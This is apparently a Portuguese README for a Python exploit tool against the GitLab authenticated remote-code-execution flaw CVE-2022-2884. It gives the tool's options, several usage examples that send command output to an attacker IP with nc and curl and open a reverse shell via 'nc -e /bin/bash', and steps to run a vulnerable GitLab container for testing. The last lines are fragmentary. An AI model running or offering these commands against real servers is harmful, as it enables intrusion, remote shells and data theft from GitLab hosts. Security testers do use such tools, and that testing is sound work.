
Explora a vulnerabilidade de RCE autenticado do GitLab conhecida como CVE-2022-2884.
Este é um programa em Python3 que explora a vulnerabilidade de RCE autenticado do GitLab conhecida como CVE-2022-2884.
Esta ferramenta é destinada a engenheiros de segurança e profissionais de AppSec para avaliações de segurança. Use esta ferramenta com responsabilidade. Não me responsabilizo pela forma como qualquer pessoa utiliza esta aplicação. NÃO sou responsável por quaisquer danos causados ou crimes cometidos pelo uso desta ferramenta.
$ ./gitlab_rce_cve-2022-2884.py --help
usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v]
Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - v1.0 (2022-12-25)
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL of the victim GitLab
-pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN
private token of GitLab
-tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE
target namespace of GitLab (default is 'root')
-a ADDRESS, --address ADDRESS
IP address of the attacker machine
-p PORT, --port PORT TCP port of the attacker machine (default is 1337)
-s, --https set if the attacker machine is exposed via HTTPS
-c COMMAND, --command COMMAND
the command to execute
-d DELAY, --delay DELAY
seconds of delay to wait for the exploit to complete
-v, --verbose verbose mode
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- "
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180
./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash"
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash"
Uma aplicação vulnerável pode ser configurada com os seguintes comandos.
export GITLAB_HOME=/srv/gitlab
docker run --detach --rm \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 --publish 22:22 \
--name vuln-gitlab \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
--shm-size 256m \
gitlab/gitlab-ce:15.3.0-ce.0
Pode levar algum tempo até que o contêiner Docker comece a responder às consultas. Em seguida, conecte-se a http://localhost.
Entre com o nome de usuário root e a senha do seguinte comando.
docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password
Para testar o exploit localmente, você precisa adicionar --network="host" ao comando docker run e remover as restrições para solicitações de saída no GitLab:
127.0.0.1 à caixa de texto "Endereços IP locais e nomes de domínio que hooks e serviços podem acessar";O pré-requisito do exploit é ter um token privado no GitLab:
api.Consulte o arquivo LICENSE para obter detalhes.